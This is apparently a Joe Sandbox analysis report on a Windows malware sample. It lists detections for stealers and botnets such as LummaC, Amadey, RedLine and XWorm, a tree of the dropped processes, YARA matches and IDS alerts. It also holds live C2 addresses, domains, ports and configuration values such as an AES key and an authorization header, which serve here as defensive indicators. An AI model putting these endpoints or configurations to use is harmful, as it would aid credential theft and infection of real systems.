Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1520057
MD5:49a9681922ad571a4a24b42465e5cdc4
SHA1:f710153121bcde5e6acd4760001d916675973475
SHA256:c66b9636df8b16d69170b47f28611d70194925cd941c0a7ed49a6f35a599dad6
Tags:exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected CryptOne packer
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Socks5Systemz
Yara detected Stealc
Yara detected Vidar stealer
Yara detected XWorm
Yara detected zgRAT
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to inject code into remote processes
Creates multiple autostart registry keys
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs new ROOT certificates
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops certificate files (DER)
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 5588 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 49A9681922AD571A4A24B42465E5CDC4)
    • axplong.exe (PID: 4720 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: 49A9681922AD571A4A24B42465E5CDC4)
  • axplong.exe (PID: 4564 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 49A9681922AD571A4A24B42465E5CDC4)
  • axplong.exe (PID: 5632 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 49A9681922AD571A4A24B42465E5CDC4)
    • gold.exe (PID: 2972 cmdline: "C:\Users\user\AppData\Local\Temp\1000002001\gold.exe" MD5: 389881B424CF4D7EC66DE13F01C7232A)
      • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 5580 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • 12dsvc.exe (PID: 3724 cmdline: "C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe" MD5: 84263AB03B0A0F2B51CC11B93EC49C9F)
      • conhost.exe (PID: 1216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 1712 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • qKLAD7yUjj.exe (PID: 5600 cmdline: "C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe" MD5: A3EF9920A91B891837705E46BB26DE17)
        • hjhTHr6fWy.exe (PID: 1856 cmdline: "C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe" MD5: 4E60F3FD76D9EAB244F9DC00F7765B0B)
    • Nework.exe (PID: 4524 cmdline: "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe" MD5: F5D7B79EE6B6DA6B50E536030BCC3B59)
      • Hkbsse.exe (PID: 4220 cmdline: "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe" MD5: F5D7B79EE6B6DA6B50E536030BCC3B59)
    • stealc_default2.exe (PID: 528 cmdline: "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe" MD5: 7A02AA17200AEAC25A375F290A4B4C95)
    • needmoney.exe (PID: 6616 cmdline: "C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe" MD5: 7FA5C660D124162C405984D14042506F)
      • svchost015.exe (PID: 2000 cmdline: C:\Users\user\AppData\Local\Temp\svchost015.exe MD5: B826DD92D78EA2526E465A34324EBEEA)
    • penis.exe (PID: 7152 cmdline: "C:\Users\user\AppData\Local\Temp\1000254001\penis.exe" MD5: A21700718C70EC5E787AD373CB72A757)
      • conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • crypted.exe (PID: 2956 cmdline: "C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe" MD5: FF5AFED0A8B802D74AF1C1422C720446)
      • conhost.exe (PID: 2612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 2452 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 5328 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 6472 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • LummaC222222.exe (PID: 6828 cmdline: "C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe" MD5: 2F1D09F64218FFFE7243A8B44345B27E)
    • newbundle2.exe (PID: 6800 cmdline: "C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe" MD5: 58E8B2EB19704C5A59350D4FF92E5AB6)
    • rstxdhuj.exe (PID: 1216 cmdline: "C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe" MD5: 1EF39C8BC5799AA381FE093A1F2D532A)
      • InstallUtil.exe (PID: 4024 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
        • WerFault.exe (PID: 3844 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 904 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • cccc2.exe (PID: 7068 cmdline: "C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe" MD5: 6B470F7251AA9C14D7DAEA8F6446E217)
      • conhost.exe (PID: 1084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 4536 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 428 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • Hkbsse.exe (PID: 7040 cmdline: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe MD5: F5D7B79EE6B6DA6B50E536030BCC3B59)
    • stories.exe (PID: 5020 cmdline: "C:\Users\user\AppData\Local\Temp\1000065001\stories.exe" MD5: BB4417D907E43503F714273F1AE9CF44)
      • stories.tmp (PID: 5028 cmdline: "C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp" /SL5="$8045C,2980754,56832,C:\Users\user\AppData\Local\Temp\1000065001\stories.exe" MD5: C8AFA039FC2A7F032512686FB50692DF)
        • fidovideorecorder32_64.exe (PID: 3288 cmdline: "C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe" -i MD5: B19555358F3C9ABC6157B2B7AAB2F658)
  • svchost.exe (PID: 3372 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 3876 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 6452 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4024 -ip 4024 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}
{"C2 url": ["lootebarrkeyn.shop", "ghostreedmnu.shop", "fragnantbui.shop", "vozmeatillu.shop", "stogeneratmns.shop", "reinforcenh.shop", "offensivedzvju.shop", "gutterydhowi.shop", "drawzhotdog.shop"], "Build id": "FATE99--Mix"}
{"C2 url": ["188.190.10.161"], "Port": "4444", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
{"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}
{"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
{"C2 url": "95.179.250.45:26212", "Bot Id": "LiveTraffic", "Message": "Error! Disable antivirus and try again!", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exeMALWARE_Win_zgRATDetects zgRATditekSHen
            • 0x58801:$s1: file:///
            • 0x58739:$s2: {11111-22222-10009-11112}
            • 0x58791:$s3: {11111-22222-50001-00000}
            • 0x54fb8:$s4: get_Module
            • 0x4ec48:$s5: Reverse
            • 0x4fa7a:$s6: BlockCopy
            • 0x4eb63:$s7: ReadByte
            • 0x58813:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
            C:\Users\user\AppData\Local\Temp\1000254001\penis.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              C:\Users\user\AppData\Local\Temp\1000254001\penis.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 13 entries
                SourceRuleDescriptionAuthorStrings
                00000003.00000002.2137528658.00000000006D1000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  00000020.00000002.3006538986.0000000000A9E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
                    00000007.00000002.2695505270.00000000037A5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
                        00000013.00000000.2774274390.0000000000F51000.00000080.00000001.01000000.00000012.sdmpJoeSecurity_StealcYara detected StealcJoe Security
                          Click to see the 62 entries
                          SourceRuleDescriptionAuthorStrings
                          37.2.InstallUtil.exe.800000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                            37.2.InstallUtil.exe.800000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                            • 0x8975:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                            • 0x8a12:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                            • 0x8b27:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                            • 0x8507:$cnc4: POST / HTTP/1.1
                            7.2.gold.exe.37a5570.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                              19.0.stealc_default2.exe.f50000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                                22.2.needmoney.exe.30ea4b9.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                                  Click to see the 36 entries

                                  System Summary

                                  barindex
                                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1000354001\c9a37ab27e.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 5632, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c9a37ab27e.exe
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1000354001\c9a37ab27e.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 5632, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c9a37ab27e.exe
                                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3372, ProcessName: svchost.exe
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:40.834724+020020546531A Network Trojan was detected192.168.2.549761172.67.162.108443TCP
                                  2024-09-27T04:21:41.799990+020020546531A Network Trojan was detected192.168.2.549764104.21.4.136443TCP
                                  2024-09-27T04:21:42.768513+020020546531A Network Trojan was detected192.168.2.549768188.114.97.3443TCP
                                  2024-09-27T04:21:43.796860+020020546531A Network Trojan was detected192.168.2.549770188.114.96.3443TCP
                                  2024-09-27T04:21:44.935333+020020546531A Network Trojan was detected192.168.2.549772188.114.96.3443TCP
                                  2024-09-27T04:21:45.910489+020020546531A Network Trojan was detected192.168.2.549775172.67.162.108443TCP
                                  2024-09-27T04:21:47.001883+020020546531A Network Trojan was detected192.168.2.549777188.114.97.3443TCP
                                  2024-09-27T04:21:47.966310+020020546531A Network Trojan was detected192.168.2.549779188.114.96.3443TCP
                                  2024-09-27T04:21:48.954207+020020546531A Network Trojan was detected192.168.2.549780172.67.208.139443TCP
                                  2024-09-27T04:21:51.541031+020020546531A Network Trojan was detected192.168.2.549786104.21.2.13443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:40.834724+020020498361A Network Trojan was detected192.168.2.549761172.67.162.108443TCP
                                  2024-09-27T04:21:41.799990+020020498361A Network Trojan was detected192.168.2.549764104.21.4.136443TCP
                                  2024-09-27T04:21:42.768513+020020498361A Network Trojan was detected192.168.2.549768188.114.97.3443TCP
                                  2024-09-27T04:21:43.796860+020020498361A Network Trojan was detected192.168.2.549770188.114.96.3443TCP
                                  2024-09-27T04:21:44.935333+020020498361A Network Trojan was detected192.168.2.549772188.114.96.3443TCP
                                  2024-09-27T04:21:45.910489+020020498361A Network Trojan was detected192.168.2.549775172.67.162.108443TCP
                                  2024-09-27T04:21:47.001883+020020498361A Network Trojan was detected192.168.2.549777188.114.97.3443TCP
                                  2024-09-27T04:21:47.966310+020020498361A Network Trojan was detected192.168.2.549779188.114.96.3443TCP
                                  2024-09-27T04:21:48.954207+020020498361A Network Trojan was detected192.168.2.549780172.67.208.139443TCP
                                  2024-09-27T04:21:51.541031+020020498361A Network Trojan was detected192.168.2.549786104.21.2.13443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:40.067143+020020561571Domain Observed Used for C2 Detected192.168.2.549761172.67.162.108443TCP
                                  2024-09-27T04:21:45.410461+020020561571Domain Observed Used for C2 Detected192.168.2.549775172.67.162.108443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:46.529810+020020561551Domain Observed Used for C2 Detected192.168.2.549777188.114.97.3443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:42.286462+020020561631Domain Observed Used for C2 Detected192.168.2.549768188.114.97.3443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:41.358465+020020561651Domain Observed Used for C2 Detected192.168.2.549764104.21.4.136443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:43.341734+020020561611Domain Observed Used for C2 Detected192.168.2.549770188.114.96.3443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:48.506040+020020561511Domain Observed Used for C2 Detected192.168.2.549780172.67.208.139443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:47.497422+020020561531Domain Observed Used for C2 Detected192.168.2.549779188.114.96.3443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:44.366238+020020561591Domain Observed Used for C2 Detected192.168.2.549772188.114.96.3443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:08.333467+020020432341A Network Trojan was detected95.179.250.4526212192.168.2.549714TCP
                                  2024-09-27T04:21:12.438294+020020432341A Network Trojan was detected65.21.18.5145580192.168.2.549719TCP
                                  2024-09-27T04:21:12.583748+020020432341A Network Trojan was detected65.21.18.5145580192.168.2.549719TCP
                                  2024-09-27T04:21:29.526562+020020432341A Network Trojan was detected89.105.223.19629862192.168.2.549743TCP
                                  2024-09-27T04:21:29.739621+020020432341A Network Trojan was detected89.105.223.19629862192.168.2.549743TCP
                                  2024-09-27T04:21:33.068659+020020432341A Network Trojan was detected185.215.113.6715206192.168.2.549750TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-09-27T04:21:08.140028+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:12.148645+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:13.398377+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:13.817728+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:14.176245+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:14.482192+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:14.682022+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:14.973067+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:15.170311+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:15.369248+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:15.616618+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:15.856746+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:16.052602+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:16.332605+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:16.661175+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:16.780172+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:16.977314+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:17.186234+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:17.494773+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:17.508217+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:17.843765+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:18.060072+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:18.772116+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:19.178330+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:19.183486+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:20.219293+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:20.611307+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:20.813244+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:20.908544+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:21.017152+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:21.102882+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:21.296039+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:21.567423+020020432311A Network Trojan was detected192.168.2.54971495.179.250.4526212TCP
                                  2024-09-27T04:21:21.576698+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:21.782648+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:22.097536+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:22.313225+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:22.534709+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:22.736067+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:23.364228+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:23.568877+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:24.078791+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:24.391440+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:25.937055+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:26.137919+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:26.338483+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:26.650781+020020432311A Network Trojan was detected192.168.2.54971965.21.18.5145580TCP
                                  2024-09-27T04:21:29.352246+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:32.851910+020020432311A Network Trojan was detected192.168.2.549750185.215.113.6715206TCP
                                  2024-09-27T04:21:34.572744+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:35.394851+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:35.574292+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:35.798129+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
                                  2024-09-27T04:21:35.976244+020020432311A Network Trojan was detected192.168.2.54974389.105.223.19629862TCP
